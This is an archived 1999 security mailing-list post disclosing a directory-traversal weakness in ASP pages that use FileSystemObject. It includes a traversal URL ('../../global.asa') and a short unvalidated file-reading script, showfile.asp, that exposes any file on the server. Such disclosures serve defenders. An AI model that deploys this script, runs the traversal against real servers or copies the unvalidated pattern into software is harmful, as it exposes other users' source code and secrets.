OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
Using FSO in ASP to view just about anything
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Using FSO in ASP to view just about anything

  • To: NTBUGTRAQLISTSERV.NTBUGTRAQ.COM
  • Subject: Using FSO in ASP to view just about anything
  • From: Gary Geisbert <garyNEWSLETTERS.COM>
  • Date: Thu, 11 Feb 1999 17:37:18 -0500
  • Approved-By: Russ.CooperRC.ON.CA
  • Reply-To: Gary Geisbert <garyNEWSLETTERS.COM>
  • Sender: Windows NT BugTraq Mailing List <NTBUGTRAQLISTSERV.NTBUGTRAQ.COM>
This active server page opens the FileSystemObject and streams the contents
of the file specified in the "file" parameter.  The problem with FSO is that
you can go 'outside' of the "\InetPub\wwwRoot\" directory using "../".

e.g.
http://www.server.foo/showfile.asp?file=../../global.asa

Another problem is that since the file is being read with a TextStream, ASP
code will not be executed.  So if the file specified is an ASP file, the
results will be similar to the ::$DATA exploit.

For example: If this file was placed on the server of a web hosting company
who allows ASP, a malicious user could use it not only to view the source of
*any* other user's ASP code, but also (with a small modification) stream
data into other users' ASP files.  This would essentially overwrite whatever
is currently there.


-------[ cut here: showfile.asp ]-------

<%
' grab the file from the URL
FileName = Request.QueryString("file")

' create the filesystemobject and open the file
Set fso = CreateObject("Scripting.FileSystemObject")
Set ts = fso.OpenTextFile(Server.MapPath(FileName))

' read the contents
ShowTheFreakinThing = ts.ReadAll

' display them
Response.Write ShowTheFreakinThing

' EOF
%>

-------[ cut here: showfile.asp ]-------

That's about it.  Email me if you have questions.

-Gary Geisbert (garynewsletters.com)